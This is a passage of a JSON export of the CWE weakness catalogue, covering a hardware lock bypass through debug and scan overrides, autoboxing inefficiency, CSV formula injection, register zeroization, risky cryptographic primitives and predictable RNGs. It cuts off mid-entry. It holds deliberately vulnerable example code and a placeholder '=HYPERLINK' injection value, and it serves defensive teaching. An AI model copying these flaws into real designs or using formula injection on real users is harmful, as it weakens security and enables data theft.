15px;"}},{"#text":"lock_status &lt;= 1\'b1;","attr":{"@_style":"text-indent: 30px;"}},{"#text":"end","attr":{"@_style":"text-indent: 15px;"}},{"#text":"else if (~Lock)","attr":{"@_style":"text-indent: 15px;"}},{"#text":"begin","attr":{"@_style":"text-indent: 15px;"}},{"#text":"lock_status &lt;= lock_status","attr":{"@_style":"text-indent: 30px;"}},{"#text":"end","attr":{"@_style":"text-indent: 15px;"}},"","always @(posedge Clk or negedge resetn)",{"#text":"if (~resetn) // Register is reset resetn","attr":{"@_style":"text-indent: 15px;"}},{"#text":"begin","attr":{"@_style":"text-indent: 15px;"}},{"#text":"Data_out &lt;= 16\'h0000;","attr":{"@_style":"text-indent: 30px;"}},{"#text":"end","attr":{"@_style":"text-indent: 15px;"}},{"#text":"else if (write &amp; (~lock_status | scan_mode | debug_unlocked) ) // Register protected by Lock bit input, overrides supported for scan_mode &amp; debug_unlocked","attr":{"@_style":"text-indent: 15px;"}},{"#text":"begin","attr":{"@_style":"text-indent: 15px;"}},{"#text":"Data_out &lt;= Data_in;","attr":{"@_style":"text-indent: 30px;"}},{"#text":"end","attr":{"@_style":"text-indent: 15px;"}},{"#text":"else if (~write)","attr":{"@_style":"text-indent: 15px;"}},{"#text":"begin","attr":{"@_style":"text-indent: 15px;"}},{"#text":"Data_out &lt;= Data_out;","attr":{"@_style":"text-indent: 30px;"}},{"#text":"end","attr":{"@_style":"text-indent: 15px;"}},"","endmodule"]},{"#text":"Either remove the debug and scan mode overrides or protect enabling of these modes so that only trusted and authorized users may enable these modes.","attr":{"@_Nature":"good"}}],"Body_Text":"If either the scan_mode or the debug_unlocked modes can be triggered by software, then the lock protection may be bypassed."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"176"}},{"attr":{"@_CAPEC_ID":"180"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-01-15"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Modes_of_Introduction, Potential_Mitigations, Related_Attack_Patterns"}}},"1235":{"attr":{"@_ID":"1235","@_Name":"Incorrect Use of Autoboxing and Unboxing for Performance Critical Operations","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The code uses boxed primitives, which may introduce inefficiencies into performance-critical operations.","Extended_Description":{"xhtml:p":["Languages such as Java and C# support automatic conversion through their respective compilers from primitive types into objects of the corresponding wrapper classes, and vice versa. For example, a compiler might convert an int to Integer (called autoboxing) or an Integer to int (called unboxing). This eliminates forcing the programmer to perform these conversions manually, which makes the code cleaner.","However, this feature comes at a cost of performance and can lead to resource exhaustion and impact availability when used with generic collections. Therefore, they should not be used for scientific computing or other performance critical operations. They are only suited to support \\"impedance mismatch\\" between reference types and primitives."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"400","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}],"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"The programmer may use boxed primitives when not strictly necessary."}},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":["DoS: Resource Consumption (CPU)","DoS: Resource Consumption (Memory)","DoS: Resource Consumption (Other)","Reduce Performance"],"Likelihood":"Low","Note":"Incorrect autoboxing/unboxing would result in reduced performance, which sometimes can lead to resource consumption issues."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Use of boxed primitives should be limited to certain situations such as when calling methods with typed parameters.  Examine the use of boxed primitives prior to use. Use SparseArrays or ArrayMap instead of HashMap to avoid performance overhead."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"Java has a boxed primitive for each primitive type. A long can be represented with the boxed primitive Long. Issues arise where boxed primitives are used when not strictly necessary.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"Long count = 0L;for (long i = 0; i &lt; Integer.MAX_VALUE; i++) {}","xhtml:br":"","xhtml:div":{"#text":"count += i;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},"Body_Text":"In the above loop, we see that the count variable is declared as a boxed primitive. This causes autoboxing on the line that increments. This causes execution to be magnitudes less performant (time and possibly space) than if the \\"long\\" primitive was used to declare the count variable, which can impact availability of a resource."},{"Intro_Text":"This code uses primitive long which fixes the issue.","Example_Code":{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"long count = 0L;for (long i = 0; i &lt; Integer.MAX_VALUE; i++) {}","xhtml:br":"","xhtml:div":{"#text":"count += i;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}}}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"SEI CERT Oracle Coding Standard for Java"},"Entry_ID":"EXP04-J","Entry_Name":"Do not pass arguments to certain Java Collections Framework methods that are a different type than the collection parameter type"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1051"}},{"attr":{"@_External_Reference_ID":"REF-1052"}}]},"Content_History":{"Submission":{"Submission_Name":"Joe Harvey","Submission_Date":"2019-10-14"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}}},"1236":{"attr":{"@_ID":"1236","@_Name":"Improper Neutralization of Formula Elements in a CSV File","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software saves user-provided information into a Comma-Separated Value (CSV) file, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as a command when the file is opened by spreadsheet software.","Extended_Description":"User-provided data is often saved to traditional databases.  This data can be exported to a CSV file, which allows users to read the data using spreadsheet software such as Excel, Numbers, or Calc.  This software interprets entries beginning with \'=\' as formulas, which are then executed by the spreadsheet software.  The software\'s formula language often allows methods to access hyperlinks or the local command line, and frequently allows enough characters to invoke an entire script. Attackers can populate data fields which, when saved to a CSV file, may attempt information exfiltration or other malicious activity when automatically executed by the spreadsheet software.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Name":"Other","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"CSV Injection"},{"Term":"Formula Injection"},{"Term":"Excel Macro Injection"}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"The weakness is in the implementation of a software\'s CSV export feature, in particular how it formats formula entries as the output gets flattened into a text file."}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":["Read Application Data","Execute Unauthorized Code or Commands"],"Likelihood":"Low","Note":"Current versions of Excel warn users of untrusted content."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"When generating CSV output, ensure that formula-sensitive metacharacters are effectively escaped or removed from all data before storage in the resultant CSV.  Risky characters include \'=\' (equal), \'+\' (plus), \'-\' (minus), and \'@\' (at).","Effectiveness":"Moderate","Effectiveness_Notes":"Unfortunately, there is no perfect solution, since different spreadsheet products act differently."},{"Phase":"Implementation","Description":"If a field starts with a formula character, prepend it with a \' (single apostrophe), which prevents Excel from executing the formula.","Effectiveness":"Moderate","Effectiveness_Notes":"It is not clear how effective this mitigation is with other spreadsheet software."},{"Phase":"Architecture and Design","Description":"Certain implementations of spreadsheet software might disallow formulas from executing if the file is untrusted, or if the file is not authored by the current user.","Effectiveness":"Limited","Effectiveness_Notes":"This mitigation has limited effectiveness because it often depends on end users opening spreadsheet software safely."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Hyperlinks or other commands can be executed when a cell begins with the formula identifier, \'=\'","Example_Code":[{"attr":{"@_Nature":"attack","@_Language":"Other"},"xhtml:p":"=HYPERLINK(link_location, [friendly_name])"},{"attr":{"@_Nature":"good"},"xhtml:p":"HYPERLINK(link_location, [friendly_name])"}],"Body_Text":"Stripping the leading equals sign, or simply not executing formulas from untrusted sources, impedes malicious activity."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-12134","Description":"Low privileged user can trigger CSV injection through a contact form field value","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12134"},{"Reference":"CVE-2019-4521","Description":"Cloud management product allows arbitrary command execution via CSV injection","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-4521"},{"Reference":"CVE-2019-17661","Description":"CSV injection in content management system via formula code in a first or last name","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17661"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-21"}},{"attr":{"@_External_Reference_ID":"REF-22"}},{"attr":{"@_External_Reference_ID":"REF-23"}},{"attr":{"@_External_Reference_ID":"REF-24"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2019-11-21"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Description, Potential_Mitigations"}]}},"1239":{"attr":{"@_ID":"1239","@_Name":"Improper Zeroization of Hardware Register","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The hardware product does not properly clear sensitive information from built-in registers when the user of the hardware block changes.","Extended_Description":"Hardware logic operates on data stored in registers local to the hardware block. Most hardware IPs, including cryptographic accelerators, rely on registers to buffer I/O, store intermediate values, and interface with software. The result of this is that sensitive information, such as passwords or encryption keys, can exist in locations not transparent to the user of the hardware logic. When a different entity obtains access to the IP due to a change in operating mode or conditions, the new entity can extract information belonging to the previous user if no mechanisms are in place to clear register contents. It is important to clear information stored in the hardware if a physical attack on the product is detected, or if the user of the hardware block changes. The process of clearing register contents in a hardware IP is referred to as zeroization in standards for cryptographic hardware modules such as FIPS-140-2 [REF-267].","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"226","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"226","@_View_ID":"1194","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"Lack of hardware mechanisms to zeroize or clear registers in the design or specification."},{"Phase":"Implementation","Note":"Mechanisms to zeroize and clear registers are in the design but implemented incorrectly."},{"Phase":"Operation","Note":"Hardware-provided zeroization mechanisms are not used appropriately by the IP user (ex. firmware), or data remanence issues are not taken into account."}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Varies by Context","Note":"The consequences will depend on the information disclosed due to the vulnerability."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Every register potentially containing sensitive information must have a policy specifying how and when information is cleared, in addition to clarifying if it is the responsibility of the hardware logic or IP user to initiate the zeroization procedure at the appropriate time.","Effectiveness_Notes":"Unfortunately, data disclosure can occur even after information has been overwritten/zeroized from the digital perspective. Physical characteristics of the memory can reveal the history of previously written data.  For example, if the same value is written repeatedly to a memory location, the corresponding memory cells can become physically altered to a degree that even if the original data is erased it can still be recovered through physical characterization of the memory cells [REF-1055]."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Suppose a hardware IP for implementing an encryption routine works as expected, but it leaves the intermediate results in some registers that can be accessed. Exactly why this access happens is immaterial - it might be unintentional or intentional, where the designer wanted a \\"quick fix\\" for something."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"150"}},{"attr":{"@_CAPEC_ID":"204"}},{"attr":{"@_CAPEC_ID":"37"}},{"attr":{"@_CAPEC_ID":"545"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-267"}},{"attr":{"@_External_Reference_ID":"REF-1055"}}]},"Content_History":{"Submission":{"Submission_Name":"Nicole Fern","Submission_Organization":"Tortuga Logic","Submission_Date":"2020-02-08"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1240":{"attr":{"@_ID":"1240","@_Name":"Use of a Cryptographic Primitive with a Risky Implementation","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"To fulfill the need for a cryptographic primitive, the product implements a cryptographic algorithm using a non-standard, unproven, or disallowed/non-compliant cryptographic implementation.","Extended_Description":{"xhtml:p":["Cryptographic protocols and systems depend on cryptographic primitives (and associated algorithms) as their basic building blocks. Some common examples of primitives are digital signatures, one-way hash functions, ciphers, and public key cryptography; however, the notion of \\"primitive\\" can vary depending on point of view. See \\"Terminology Notes\\" for further explanation of some concepts.","Cryptographic primitives are defined to accomplish one very specific task in a precisely defined and mathematically reliable fashion. For example, suppose that for a specific cryptographic primitive (such as an encryption routine), the consensus is that the primitive can only be broken after trying out N different inputs (where the larger the value of N, the stronger the cryptography). For an encryption scheme like AES-256, one would expect N to be so large as to be infeasible to execute in a reasonable amount of time.","If a vulnerability is ever found that shows that one can break a cryptographic primitive in significantly less than the expected number of attempts, then that primitive is considered weakened (or sometimes in extreme cases, colloquially it is \\"broken\\"). As a result, anything using this cryptographic primitive would now be considered insecure or risky. Thus, even breaking or weakening a seemingly small cryptographic primitive has the potential to render the whole system vulnerable, due to its reliance on the primitive. A historical example can be found in TLS when using DES. One would colloquially call DES the cryptographic primitive for transport encryption in this version of TLS. In the past, DES was considered strong, because no weaknesses were found in it; importantly, DES has a key length of 56 bits. Trying N=2^56 keys was considered impractical for most actors. Unfortunately, attacking a system with 56-bit keys is now practical via brute force, which makes defeating DES encryption practical. It is now practical for an adversary to read any information sent under this version of TLS and use this information to attack the system. As a result, it can be claimed that this use of TLS is weak, and that any system depending on TLS with DES could potentially render the entire system vulnerable to attack.","Cryptographic primitives and associated algorithms are only considered safe after extensive research and review from experienced cryptographers from academia, industry, and government entities looking for any possible flaws. Furthermore, cryptographic primitives and associated algorithms are frequently reevaluated for safety when new mathematical and attack techniques are discovered.  As a result and over time, even well-known cryptographic primitives can lose their compliance status with the discovery of novel attacks that might either defeat the algorithm or reduce its robustness significantly.","If ad-hoc cryptographic primitives are implemented, it is almost certain that the implementation will be vulnerable to attacks that are well understood by cryptographers, resulting in the exposure of sensitive information and other consequences.","This weakness is even more difficult to manage for hardware-implemented deployment of cryptographic algorithms. First, because hardware is not patchable as easily as software, any flaw discovered after release and production typically cannot be fixed without a recall of the product. Secondly, the hardware product is often expected to work for years, during which time computation power available to the attacker only increases. Therefore, for hardware implementations of cryptographic primitives, it is absolutely essential that only strong, proven cryptographic primitives are used."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"327","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"This weakness is primarily introduced during the architecture and design phase as risky primitives are included."},{"Phase":"Implementation","Note":"Even in cases where the Architectural phase properly specifies a cryptographically secure design, the design may be changed during implementation due to unforeseen constraints."}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Likelihood":"High","Note":"Incorrect usage of crypto primitives could render the supposedly encrypted data as unencrypted plaintext in the worst case."}},"Detection_Methods":{"Detection_Method":[{"Method":"Architecture or Design Review","Description":"Review requirements, documentation, and product design to ensure that primitives are consistent with the strongest-available recommendations from trusted parties. If the product appears to be using custom or proprietary implementations that have not had sufficient public review and approval, then this is a significant concern.","Effectiveness":"High"},{"Method":"Manual Analysis","Description":"Analyze the product to ensure that implementations for each primitive do not contain any known vulnerabilities and are not using any known-weak algorithms, including MD4, MD5, SHA1, DES, etc.","Effectiveness":"Moderate"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":"For hardware, during the implementation (pre-Silicon / post-Silicon) phase, dynamic tests should be done to ensure that outputs from cryptographic routines are indeed working properly, such as test vectors provided by NIST [REF-1236].","Effectiveness":"Moderate"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":"It needs to be determined if the output of a cryptographic primitive is lacking entropy, which is one clear sign that something went wrong with the crypto implementation. There exist many methods of measuring the entropy of a bytestream, from sophisticated ones (like calculating Shannon\'s entropy of a sequence of characters) to crude ones (by compressing it and comparing the size of the original bytestream vs. the compressed - a truly random byte stream should not be compressible and hence the uncompressed and compressed bytestreams should be nearly identical in size).","Effectiveness":"Moderate"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-55"},"Phase":"Requirements","Description":"Require compliance with the strongest-available recommendations from trusted parties, and require that compliance must be kept up-to-date, since recommendations evolve over time. For example, US government systems require FIPS 140-3 certification, which supersedes FIPS 140-2 [REF-1192] [REF-1226].","Effectiveness":"High"},{"Phase":"Architecture and Design","Description":"Ensure that the architecture/design uses the strongest-available primitives and algorithms from trusted parties. For example, US government systems require FIPS 140-3 certification, which supersedes FIPS 140-2 [REF-1192] [REF-1226].","Effectiveness":"High"},{"attr":{"@_Mitigation_ID":"MIT-54"},"Phase":"Architecture and Design","Description":"Do not develop custom or private cryptographic algorithms. They will likely be exposed to attacks that are well-understood by cryptographers. As with all cryptographic mechanisms, the source code should be available for analysis. If the algorithm may be compromised when attackers find out how it works, then it is especially weak.","Effectiveness":"Discouraged Common Practice"},{"Phase":"Architecture and Design","Description":"Try not to use cryptographic algorithms in novel ways or with new modes of operation even when you \\"know\\" it is secure. For example, using SHA-2 chaining to create a 1-time pad for encryption might sound like a good idea, but one should not do this.","Effectiveness":"Discouraged Common Practice"},{"attr":{"@_Mitigation_ID":"MIT-52"},"Phase":"Architecture and Design","Description":"Ensure that the design can replace one cryptographic primitive or algorithm with another in the next generation (\\"cryptographic agility\\"). Where possible, use wrappers to make the interfaces uniform. This will make it easier to upgrade to stronger algorithms. This is especially important for hardware, which can be more difficult to upgrade quickly than software; design the hardware at a replaceable block level.","Effectiveness":"Defense in Depth"},{"Phase":"Architecture and Design","Description":"Do not use outdated or non-compliant cryptography algorithms. Some older algorithms, once thought to require a billion years of computing time, can now be broken in days or hours. This includes MD4, MD5, SHA1, DES, and other algorithms that were once regarded as strong [REF-267].","Effectiveness":"Discouraged Common Practice"},{"Phase":["Architecture and Design","Implementation"],"Description":"Do not use a linear-feedback shift register (LFSR) or other legacy methods as a substitute for an accepted and standard Random Number Generator.","Effectiveness":"Discouraged Common Practice"},{"Phase":["Architecture and Design","Implementation"],"Description":"Do not use a checksum as a substitute for a cryptographically generated hash.","Effectiveness":"Discouraged Common Practice"},{"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":"Use a vetted cryptographic library or framework. Industry-standard implementations will save development time and are more likely to avoid errors that can occur during implementation of cryptographic algorithms. However, the library/framework could be used incorrectly during implementation.","Effectiveness":"High"},{"Phase":["Architecture and Design","Implementation"],"Description":"When using industry-approved techniques, use them correctly. Don\'t cut corners by skipping resource-intensive steps (CWE-325). These steps are often essential for the prevention of common attacks.","Effectiveness":"Moderate"},{"Phase":["Architecture and Design","Implementation"],"Description":"Do not store keys in areas accessible to untrusted agents. Carefully manage and protect the cryptographic keys (see CWE-320). If the keys can be guessed or stolen, then the strength of the cryptography algorithm is irrelevant.","Effectiveness":"Moderate"}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Re-using random values may compromise security.","Example_Code":[{"#text":"Suppose an Encryption algorithm needs a random value for a key. Instead of using a DRNG (Deterministic Random Number Generator), the designer uses a linear-feedback shift register (LFSR) to generate the value.","attr":{"@_Nature":"bad"}},{"#text":"If a cryptographic algorithm expects a random number as its input, provide one. Do not provide a pseudo-random value.","attr":{"@_Nature":"good"}}],"Body_Text":"While an LFSR may provide pseudo-random number generation service, the entropy (measure of randomness) of the resulting output may be less than that of an accepted DRNG (like that used in dev/urandom). Thus, using an LFSR weakens the strength of the cryptographic system, because it may be possible for an attacker to guess the LFSR output and subsequently the encryption key."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2020-4778","Description":"software uses MD5, which is less safe than the default SHA-256 used by related products","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4778"},{"Reference":"CVE-2005-2946","Description":"Default configuration of product uses MD5 instead of stronger algorithms that are available, simplifying forgery of certificates.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2946"},{"Reference":"CVE-2019-3907","Description":"identity card uses MD5 hash of a salt and password","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3907"},{"Reference":"CVE-2021-34687","Description":"personal key is transmitted over the network using a substitution cipher","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34687"},{"Reference":"CVE-2020-14254","Description":"product does not disable TLS-RSA cipher suites, allowing decryption of traffic if TLS 2.0 and secure ciphers are not enabled.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14254"},{"Reference":"CVE-2019-1543","Description":"SSL/TLS library generates 16-byte nonces but reduces them to 12 byte nonces for the ChaCha20-Poly1305 cipher, converting them in a way that violates the cipher\'s requirements for unique nonces.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1543"},{"Reference":"CVE-2017-9267","Description":"LDAP interface allows use of weak ciphers","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9267"},{"Reference":"CVE-2017-7971","Description":"SCADA product allows \\"use of outdated cipher suites\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7971"},{"Reference":"CVE-2020-6616","Description":"Chip implementing Bluetooth uses a low-entropy PRNG instead of a hardware RNG, allowing spoofing.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-6616"},{"Reference":"CVE-2019-1715","Description":"security product has insufficient entropy in the DRBG, allowing collisions and private key discovery","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1715"},{"Reference":"CVE-2014-4192","Description":"Dual_EC_DRBG implementation in RSA toolkit does not correctly handle certain byte requests, simplifying plaintext recovery","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4192"},{"Reference":"CVE-2007-6755","Description":"Recommendation for Dual_EC_DRBG algorithm contains point Q constants that could simplify decryption","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6755"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"97"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-267"}},{"attr":{"@_External_Reference_ID":"REF-1227"}},{"attr":{"@_External_Reference_ID":"REF-1226"}},{"attr":{"@_External_Reference_ID":"REF-1192"}},{"attr":{"@_External_Reference_ID":"REF-1236","@_Section":"Test Vectors"}}]},"Notes":{"Note":[{"attr":{"@_Type":"Terminology"},"xhtml:p":["Terminology for cryptography varies widely, from informal and colloquial to mathematically-defined, with different precision and formalism depending on whether the stakeholder is a developer, cryptologist, etc. Yet there is a need for CWE to be self-consistent while remaining understandable and acceptable to multiple audiences.","As of CWE 4.6, CWE terminology around \\"primitives\\" and \\"algorithms\\" is emerging as shown by the following example, subject to future consultation and agreement within the CWE and cryptography communities. Suppose one wishes to send encrypted data using a CLI tool such as OpenSSL. One might choose to use AES with a 256-bit key and require tamper protection (GCM mode, for instance). For compatibility\'s sake, one might also choose the ciphertext to be formatted to the PKCS#5 standard. In this case, the \\"cryptographic system\\" would be AES-256-GCM with PKCS#5 formatting. The \\"cryptographic function\\" would be AES-256 in the GCM mode of operation, and the \\"algorithm\\" would be AES. Colloquially, one would say that AES (and sometimes AES-256) is the \\"cryptographic primitive,\\" because it is the algorithm that realizes the concept of symmetric encryption (without modes of operation or other protocol related modifications). In practice, developers and architects typically refer to base cryptographic algorithms (AES, SHA, etc.) as cryptographic primitives."]},{"#text":"Since CWE 4.4, various cryptography-related entries, including CWE-327 and CWE-1240, have been slated for extensive research, analysis, and community consultation to define consistent terminology, improve relationships, and reduce overlap or duplication. As of CWE 4.6, this work is still ongoing.","attr":{"@_Type":"Maintenance"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-10"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Background_Details, Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Modes_of_Introduction, Potential_Mitigations, Related_Attack_Patterns, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Maintenance_Notes, Research_Gaps"}],"Contribution":{"attr":{"@_Type":"Content"},"Contribution_Name":"Parbati K. Manna","Contribution_Organization":"Intel Corporation","Contribution_Date":"2021-10-18","Contribution_Comment":"provided detection methods and observed examples"}}},"1241":{"attr":{"@_ID":"1241","@_Name":"Use of Predictable Algorithm in Random Number Generator","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The device uses an algorithm that is predictable and generates a pseudo-random number.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"330","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"In many cases, the design originally defines a cryptographically secure random number generator, but is then changed during implementation due to unforeseen constraints."}]},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data","Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"A true random number generator should be specified for cryptographic algorithms."},{"Phase":"Implementation","Description":"A true random number generator should be implemented for cryptographic algorithms."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Suppose a cryptographic function expects random value to be supplied for the crypto algorithm.","Body_Text":"During the implementation phase, due to space constraint, a cryptographically secure random-number-generator could not be used, and instead  of using a TRNG (True Random Number Generator), a LFSR (Linear Feedback Shift Register) is used to generate a random value. While an LFSR will provide a pseudo-random number, its entropy (measure of randomness) is insufficient for a cryptographic algorithm."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"97"}}},"Notes":{"Note":{"#text":"As of CWE 4.5, terminology related to randomness, entropy, and\\n\\t   predictability can vary widely. Within the developer and other\\n\\t   communities, \\"randomness\\" is used heavily. However, within\\n\\t   cryptography, \\"entropy\\" is distinct, typically implied as a\\n\\t   measurement. There are no commonly-used definitions, even within\\n\\t   standards documents and cryptography papers. Future versions of\\n\\t   CWE will attempt to define these terms and, if necessary,\\n\\t   distinguish between them in ways that are appropriate for\\n\\t   different communities but do not reduce the usability of CWE for\\n\\t   mapping, understanding, or other scenarios.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-10"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Modes_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Maintenance_Notes, Modes_of_Introduction, Potential_Mitigations, Related_Attack_Patterns, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated 